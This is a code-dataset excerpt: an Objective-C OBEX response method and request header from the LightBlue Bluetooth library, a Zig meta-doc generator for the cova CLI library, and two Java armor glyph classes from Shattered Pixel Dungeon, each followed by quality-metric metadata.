return @"Continue";
case kOBEXResponseCodeSuccessWithFinalBit:
return @"Success";
case kOBEXResponseCodeCreatedWithFinalBit:
return @"Created";
case kOBEXResponseCodeAcceptedWithFinalBit:
return @"Accepted";
case kOBEXResponseCodeNonAuthoritativeInfoWithFinalBit:
return @"Non-authoritative info";
case kOBEXResponseCodeNoContentWithFinalBit:
return @"No content";
case kOBEXResponseCodeResetContentWithFinalBit:
return @"Reset content";
case kOBEXResponseCodePartialContentWithFinalBit:
return @"Partial content";
case kOBEXResponseCodeMultipleChoicesWithFinalBit:
return @"Multiple choices";
case kOBEXResponseCodeMovedPermanentlyWithFinalBit:
return @"Moved permanently";
case kOBEXResponseCodeMovedTemporarilyWithFinalBit:
return @"Moved temporarily";
case kOBEXResponseCodeSeeOtherWithFinalBit:
return @"See other";
case kOBEXResponseCodeNotModifiedWithFinalBit:
return @"Code not modified";
case kOBEXResponseCodeUseProxyWithFinalBit:
return @"Use proxy";
case kOBEXResponseCodeBadRequestWithFinalBit:
return @"Bad request";
case kOBEXResponseCodeUnauthorizedWithFinalBit:
return @"Unauthorized";
case kOBEXResponseCodePaymentRequiredWithFinalBit:
return @"Payment required";
case kOBEXResponseCodeForbiddenWithFinalBit:
return @"Forbidden";
case kOBEXResponseCodeNotFoundWithFinalBit:
return @"Not found";
case kOBEXResponseCodeMethodNotAllowedWithFinalBit:
return @"Method not allowed";
case kOBEXResponseCodeNotAcceptableWithFinalBit:
return @"Not acceptable";
case kOBEXResponseCodeProxyAuthenticationRequiredWithFinalBit:
return @"Proxy authentication required";
case kOBEXResponseCodeRequestTimeOutWithFinalBit:
return @"Request time out";
case kOBEXResponseCodeConflictWithFinalBit:
return @"Conflict";
case kOBEXResponseCodeGoneWithFinalBit:
return @"Gone";
case kOBEXResponseCodeLengthRequiredFinalBit:
return @"Length required";
case kOBEXResponseCodePreconditionFailedWithFinalBit:
return @"Precondition failed";
case kOBEXResponseCodeRequestedEntityTooLargeWithFinalBit:
return @"Requested entity too large";
case kOBEXResponseCodeRequestURLTooLargeWithFinalBit:
return @"Requested URL too large";
case kOBEXResponseCodeUnsupportedMediaTypeWithFinalBit:
return @"Unsupported media type";
case kOBEXResponseCodeInternalServerErrorWithFinalBit:
return @"Internal server error";
case kOBEXResponseCodeNotImplementedWithFinalBit:
return @"Not implemented";
case kOBEXResponseCodeBadGatewayWithFinalBit:
return @"Bad gateway";
case kOBEXResponseCodeServiceUnavailableWithFinalBit:
return @"Service unavailable";
case kOBEXResponseCodeGatewayTimeoutWithFinalBit:
return @"Gateway timeout";
case kOBEXResponseCodeHTTPVersionNotSupportedWithFinalBit:
return @"HTTP version not supported";
case kOBEXResponseCodeDatabaseFullWithFinalBit:
return @"Database full";
case kOBEXResponseCodeDatabaseLockedWithFinalBit:
return @"Database locked";
default:
return @"Unknown response";
}
}
- (BBOBEXHeaderSet *)allHeaders
{
return mHeaders;
}
- (void)dealloc
{
[mHeaders release];
[super dealloc];
}
@end
| 5,539 | BBOBEXResponse | m | en | limbo | code | {"qsc_code_num_words": 376, "qsc_code_num_chars": 5539.0, "qsc_code_mean_word_length": 9.5212766, "qsc_code_frac_words_unique": 0.54787234, "qsc_code_frac_chars_top_2grams": 0.00418994, "qsc_code_frac_chars_top_3grams": 0.01089385, "qsc_code_frac_chars_top_4grams": 0.01592179, "qsc_code_frac_chars_dupe_5grams": 0.04748603, "qsc_code_frac_chars_dupe_6grams": 0.01564246, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00127518, "qsc_code_frac_chars_whitespace": 0.29211049, "qsc_code_size_file_byte": 5539.0, "qsc_code_num_lines": 148.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 37.42567568, "qsc_code_frac_chars_alphabet": 0.9117572, "qsc_code_frac_chars_comments": 0.00992959, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.02985075, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.10521517, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBOBEXRequest.h | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBOBEXRequest.h
// LightAquaBlue
//
// These are internal classes used by BBBluetoothOBEXClient for sending OBEX
// client requests. Each BBOBEXRequest subclass encapsulates the process
// for performing a particular type of request.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/OBEX.h>
@class BBBluetoothOBEXClient;
@class BBOBEXHeaderSet;
@class BBMutableOBEXHeaderSet;
@class OBEXSession;
@interface BBOBEXRequest : NSObject
{
BBBluetoothOBEXClient *mClient;
SEL mClientEventSelector;
OBEXSession *mSession;
BOOL mFinished;
BBMutableOBEXHeaderSet *mResponseHeaders;
}
+ (void)setDebug:(BOOL)debug;
- (id)initWithClient:(BBBluetoothOBEXClient *)client
eventSelector:(SEL)selector
session:(OBEXSession *)session;
- (BOOL)isFinished;
- (OBEXError)beginWithHeaders:(BBOBEXHeaderSet *)headers;
- (void)receivedResponseWithHeaders:(BBMutableOBEXHeaderSet *)responseHeaders;
- (OBEXError)sendNextRequestPacket;
- (void)finishedWithError:(OBEXError)error responseCode:(int)responseCode;
- (BOOL)readOBEXResponseHeaders:(BBMutableOBEXHeaderSet **)responseHeaders
andResponseCode:(int *)responseCode
fromSessionEvent:(const OBEXSessionEvent *)event;
@end
@interface BBOBEXConnectRequest : BBOBEXRequest
{
CFMutableDataRef mHeadersDataRef;
}
@end
@interface BBOBEXDisconnectRequest : BBOBEXRequest
{
CFMutableDataRef mHeadersDataRef;
}
@end
@interface BBOBEXPutRequest : BBOBEXRequest
{
CFMutableDataRef mHeadersDataRef;
NSMutableData *mSentBodyData;
NSInputStream *mInputStream;
}
- (id)initWithClient:(BBBluetoothOBEXClient *)client
eventSelector:(SEL)selector
session:(OBEXSession *)session
inputStream:(NSInputStream *)inputStream;
@end
@interface BBOBEXGetRequest : BBOBEXRequest
{
CFMutableDataRef mHeadersDataRef;
NSOutputStream *mOutputStream;
unsigned int mTotalGetLength;
}
- (id)initWithClient:(BBBluetoothOBEXClient *)client
eventSelector:(SEL)selector
session:(OBEXSession *)session
outputStream:(NSOutputStream *)outputStream;
@end
@interface BBOBEXSetPathRequest : BBOBEXRequest
{
CFMutableDataRef mHeadersDataRef;
OBEXFlags mRequestFlags;
}
- (id)initWithClient:(BBBluetoothOBEXClient *)client
eventSelector:(SEL)selector
session:(OBEXSession *)session
changeToParentDirectoryFirst:(BOOL)changeToParentDirectoryFirst
createDirectoriesIfNeeded:(BOOL)createDirectoriesIfNeeded;
@end
@interface BBOBEXAbortRequest : BBOBEXRequest
{
NSStream *mStream;
}
- (id)initWithClient:(BBBluetoothOBEXClient *)client
eventSelector:(SEL)selector
session:(OBEXSession *)session
currentRequestStream:(NSStream *)stream;
@end
| 3,512 | BBOBEXRequest | h | en | c | code | {"qsc_code_num_words": 319, "qsc_code_num_chars": 3512.0, "qsc_code_mean_word_length": 8.27899687, "qsc_code_frac_words_unique": 0.50783699, "qsc_code_frac_chars_top_2grams": 0.0272624, "qsc_code_frac_chars_top_3grams": 0.07004922, "qsc_code_frac_chars_top_4grams": 0.08140856, "qsc_code_frac_chars_dupe_5grams": 0.24763347, "qsc_code_frac_chars_dupe_6grams": 0.19538054, "qsc_code_frac_chars_dupe_7grams": 0.17417645, "qsc_code_frac_chars_dupe_8grams": 0.17417645, "qsc_code_frac_chars_dupe_9grams": 0.17417645, "qsc_code_frac_chars_dupe_10grams": 0.17417645, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00170358, "qsc_code_frac_chars_whitespace": 0.16429385, "qsc_code_size_file_byte": 3512.0, "qsc_code_num_lines": 123.0, "qsc_code_num_chars_line_max": 79.0, "qsc_code_num_chars_line_mean": 28.55284553, "qsc_code_frac_chars_alphabet": 0.89812606, "qsc_code_frac_chars_comments": 0.28018223, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.32911392, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.01265823, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
00JCIV00/cova | src/generator.zig | //! Meta Doc Generation for Cova-based programs
//! This is meant to be built and run as a step in `build.zig`.
// Standard library
const std = @import("std");
const heap = std.heap;
const json = std.json;
const log = std.log;
const mem = std.mem;
const meta = std.meta;
const Build = std.Build;
// The Cova library is needed for the `generate` module.
const cova = @import("cova");
const generate = cova.generate;
const utils = cova.utils;
/// This is a reference module for the program being built. Typically this is the main `.zig` file
/// in a project that has both the `main()` function and `setup_cmd` Command.
const program = @import("program");
/// This is a reference to the Build Options passed in from `build.zig`.
const md_config = @import("md_config_opts");
/// Help Docs Config
const help_docs_config = optsToConf(generate.HelpDocsConfig, @import("help_docs_config"));
/// Tab Completion Config
const tab_complete_config = optsToConf(generate.TabCompletionConfig, @import("tab_complete_config"));
/// Argument Template Config
const arg_template_config = optsToConf(generate.ArgTemplateConfig, @import("arg_template_config"));
const meta_info: []const []const u8 = &.{
"version",
"ver_date",
"name",
"description",
"author",
"copyright",
};
/// Translate Build Options to Meta Doc Generation Configs.
///TODO Refactor this once Build Options support Types.
fn optsToConf(comptime ConfigT: type, comptime conf_opts: anytype) ?ConfigT {
if (!conf_opts.provided) return null;
var conf = ConfigT{};
for (@typeInfo(ConfigT).@"struct".fields) |field| {
if (std.mem.eql(u8, field.name, "provided")) continue;
@field(conf, field.name) = @field(conf_opts, field.name);
if (
(
@typeInfo(@TypeOf(@field(conf, field.name))) == .optional and
@field(conf, field.name) != null
) or
utils.indexOfEql([]const u8, meta_info, field.name) == null
) continue;
@field(conf, field.name) = @field(md_config, field.name);
}
return conf;
}
pub fn main() !void {
const doc_kinds: []const generate.MetaDocConfig.MetaDocKind = comptime docKinds: {
var kinds: [md_config.kinds.len]generate.MetaDocConfig.MetaDocKind = undefined;
for (md_config.kinds, kinds[0..]) |md_kind, *kind| kind.* = @enumFromInt(md_kind);
if (kinds[0] != .all) {
const kinds_out = kinds;
break :docKinds kinds_out[0..];
}
const mdk_info = @typeInfo(generate.MetaDocConfig.MetaDocKind);
var kinds_list: [mdk_info.@"enum".fields[1..].len]generate.MetaDocConfig.MetaDocKind = undefined;
for (mdk_info.@"enum".fields[1..], kinds_list[0..]) |field, *kind| kind.* = @enumFromInt(field.value);
const kinds_out = kinds_list;
break :docKinds kinds_out[0..];
};
const cmd_type_name = @field(program, md_config.cmd_type_name);
const setup_cmd_name = @field(program, md_config.setup_cmd_name);
log.info("\nStarting Meta Doc Generation...", .{});
inline for (doc_kinds[0..]) |kind| {
switch (kind) {
.manpages, .markdown => |help_doc| {
if (help_docs_config) |hd_config| {
try generate.createHelpDoc(
cmd_type_name,
setup_cmd_name,
hd_config,
meta.stringToEnum(generate.HelpDocsConfig.DocKind, @tagName(help_doc)).?,
);
}
else {
log.warn("Missing Help Doc Configuration! Skipping.", .{});
continue;
}
},
.bash, .zsh, .ps1 => |shell| {
if (tab_complete_config) |tc_config| {
try generate.createTabCompletion(
cmd_type_name,
setup_cmd_name,
tc_config,
meta.stringToEnum(generate.TabCompletionConfig.ShellKind, @tagName(shell)).?,
);
}
else {
log.warn("Missing Tab Completion Configuration! Skipping.", .{});
continue;
}
},
.json, .kdl => |template| {
if (arg_template_config) |at_config| {
try generate.createArgTemplate(
cmd_type_name,
setup_cmd_name,
at_config,
meta.stringToEnum(generate.ArgTemplateConfig.TemplateKind, @tagName(template)).?,
);
}
else {
log.warn("Missing Argument Template Configuration! Skipping.", .{});
continue;
}
},
.all => {},
}
}
log.info("Finished Meta Doc Generation!", .{});
}
| 4,958 | generator | zig | en | zig | code | {"qsc_code_num_words": 524, "qsc_code_num_chars": 4958.0, "qsc_code_mean_word_length": 5.21946565, "qsc_code_frac_words_unique": 0.28816794, "qsc_code_frac_chars_top_2grams": 0.02632541, "qsc_code_frac_chars_top_3grams": 0.02010969, "qsc_code_frac_chars_top_4grams": 0.02632541, "qsc_code_frac_chars_dupe_5grams": 0.13272395, "qsc_code_frac_chars_dupe_6grams": 0.10201097, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00351083, "qsc_code_frac_chars_whitespace": 0.31060912, "qsc_code_size_file_byte": 4958.0, "qsc_code_num_lines": 124.0, "qsc_code_num_chars_line_max": 111.0, "qsc_code_num_chars_line_mean": 39.98387097, "qsc_code_frac_chars_alphabet": 0.79666472, "qsc_code_frac_chars_comments": 0.12747075, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.17924528, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.08067499, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.00806452, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/armor/glyphs/Brimstone.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.armor.glyphs;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.ShieldBuff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.watabou.utils.Bundle;
public class Brimstone extends Armor.Glyph {
private static ItemSprite.Glowing ORANGE = new ItemSprite.Glowing( 0xFF4400 );
@Override
public int proc(Armor armor, Char attacker, Char defender, int damage) {
//no proc effect, see Hero.isImmune and GhostHero.isImmune
return damage;
}
@Override
public ItemSprite.Glowing glowing() {
return ORANGE;
}
//pre-0.7.4 saves
public static class BrimstoneShield extends ShieldBuff {
{
type = buffType.POSITIVE;
}
@Override
public boolean act() {
Hero hero = (Hero)target;
if (hero.belongings.armor == null || !hero.belongings.armor.hasGlyph(Brimstone.class, hero)) {
detach();
return true;
}
if (shielding() > 0){
decShield();
//shield decays at a rate of 1 per turn.
spend(TICK);
} else {
detach();
}
return true;
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
//pre-0.7.0
if (bundle.contains("added")){
setShield(bundle.getInt("added"));
}
}
}
}
| 2,264 | Brimstone | java | en | java | code | {"qsc_code_num_words": 288, "qsc_code_num_chars": 2264.0, "qsc_code_mean_word_length": 5.72916667, "qsc_code_frac_words_unique": 0.52777778, "qsc_code_frac_chars_top_2grams": 0.06181818, "qsc_code_frac_chars_top_3grams": 0.13818182, "qsc_code_frac_chars_top_4grams": 0.13333333, "qsc_code_frac_chars_dupe_5grams": 0.19878788, "qsc_code_frac_chars_dupe_6grams": 0.03393939, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01609442, "qsc_code_frac_chars_whitespace": 0.17667845, "qsc_code_size_file_byte": 2264.0, "qsc_code_num_lines": 83.0, "qsc_code_num_chars_line_max": 98.0, "qsc_code_num_chars_line_mean": 27.27710843, "qsc_code_frac_chars_alphabet": 0.86909871, "qsc_code_frac_chars_comments": 0.40061837, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.17777778, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0073692, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00589536, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.31111111, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/armor/glyphs/Camouflage.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.armor.glyphs;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Invisibility;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundle;
public class Camouflage extends Armor.Glyph {
private static ItemSprite.Glowing GREEN = new ItemSprite.Glowing( 0x448822 );
@Override
public int proc(Armor armor, Char attacker, Char defender, int damage) {
//no proc effect, see HighGrass.trample
return damage;
}
@Override
public ItemSprite.Glowing glowing() {
return GREEN;
}
public static class Camo extends Invisibility {
{
announced = false;
}
private int pos;
private int left;
@Override
public boolean act() {
left--;
if (left == 0 || target.pos != pos) {
detach();
} else {
spend(TICK);
}
return true;
}
public void set(int time){
left = time;
pos = target.pos;
Sample.INSTANCE.play( Assets.SND_MELD );
}
@Override
public String toString() {
return Messages.get(this, "name");
}
@Override
public String desc() {
return Messages.get(this, "desc", dispTurns(left));
}
private static final String POS = "pos";
private static final String LEFT = "left";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle( bundle );
bundle.put( POS, pos );
bundle.put( LEFT, left );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle( bundle );
pos = bundle.getInt( POS );
left = bundle.getInt( LEFT );
}
}
}
| 2,666 | Camouflage | java | en | java | code | {"qsc_code_num_words": 331, "qsc_code_num_chars": 2666.0, "qsc_code_mean_word_length": 5.80362538, "qsc_code_frac_words_unique": 0.4652568, "qsc_code_frac_chars_top_2grams": 0.03748048, "qsc_code_frac_chars_top_3grams": 0.13846955, "qsc_code_frac_chars_top_4grams": 0.13742842, "qsc_code_frac_chars_dupe_5grams": 0.17178553, "qsc_code_frac_chars_dupe_6grams": 0.02915148, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01151543, "qsc_code_frac_chars_whitespace": 0.18567142, "qsc_code_size_file_byte": 2666.0, "qsc_code_num_lines": 102.0, "qsc_code_num_chars_line_max": 79.0, "qsc_code_num_chars_line_mean": 26.1372549, "qsc_code_frac_chars_alphabet": 0.87333026, "qsc_code_frac_chars_comments": 0.30757689, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.109375, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00813008, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00433604, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.109375, "qsc_codejava_score_lines_no_logic": 0.328125, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, 